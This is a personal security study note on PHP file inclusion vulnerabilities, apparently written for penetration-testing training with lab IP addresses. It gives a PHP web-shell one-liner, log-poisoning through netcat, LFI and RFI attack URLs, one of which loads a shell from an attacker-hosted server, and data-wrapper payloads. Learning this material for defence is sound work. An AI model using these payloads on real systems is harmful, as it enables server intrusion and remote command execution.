Till Studer's Notes

Recent Notes

Eating Your Own Dog Food
Dec 27, 2024
The Map Is Not the Territory
Dec 27, 2024
The Zen of Security Rules
Aug 22, 2024
Public Attack Simulation Repos
Aug 03, 2024
Public Detection Rule Repos
Aug 03, 2024

❯

01_Zettelkasten

❯

File Inclusion Vulnerabilities

Aug 29, 20232 min read

File Inclusion Vulnerabilities

This vuln allows an attacker to include the contents of a file in the webpage
To exploit, we need to be able to execute code and write our shell code somewhere (local or remote)
Also the language used makes a considerable difference when crafting the payload

Identifying File Inclusion Vulnerabilities

Exactly the same as with Directory Traversal Vulnerabilities, but we also need to the contents of the file to be executed, not just displayed.

Exploiting Local File Inclusion (LFI)

If the source PHP contains something similar to: <?php include $_GET["file"]; ?>
We probably can’t upload a file directly to the server, but if we can we can include our payload there and reference it in the file query string to achieve a LFI

Contaminating Log Files

We can try to inject code by poisoning the log files
- nc -nv 10.11.0.22 80
  - <?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
    - <php ;?>: Everything is written in PHP (the servers language)
    - <pre></pre>: To preserve everything, even line breaks
    - shell_exec($_GET['cmd']): Execute any command received via the cmd query string in a shell

LFI Code Execution

http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig

Remote File Inclusion (RFI)

Less common, because the server must allow loading files for remote locations, but its much easier to exploit
echo "<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>" > /vat/www/html/evil.txt
Start our apache server: sudo systemctl start apache2
http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt&cmd=ipconfig
This is a Web Shell!
- Web Shells for common languages can be found at /usr/share/webshells

Expanding Your Repertoire

Alternatives to apache (Host any files in the current working path on an arbitrary port)
- python -m SimpleHTTPServer 7721
- python3 -m http.server 7331
- php -S 0.0.0.0:8000
- ruby -run -e httpd . -p 9000
- busybox httpd -f -p 10000

PHP Wrappers

Data wrapper allows exploiting a LFI without any local files
- http://10.11.0.22/menu.php?file=data:text/plain,hello world
  - data type, data contents
- http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

Relevant Note(s):

Graph View

File Inclusion Vulnerabilities
Identifying File Inclusion Vulnerabilities
Exploiting Local File Inclusion (LFI)
Contaminating Log Files
LFI Code Execution
Remote File Inclusion (RFI)
Expanding Your Repertoire
PHP Wrappers

Backlinks

Web Application Attacks

Created with Quartz v4.4.0 © 2025

GitHub
LinkedIn
Email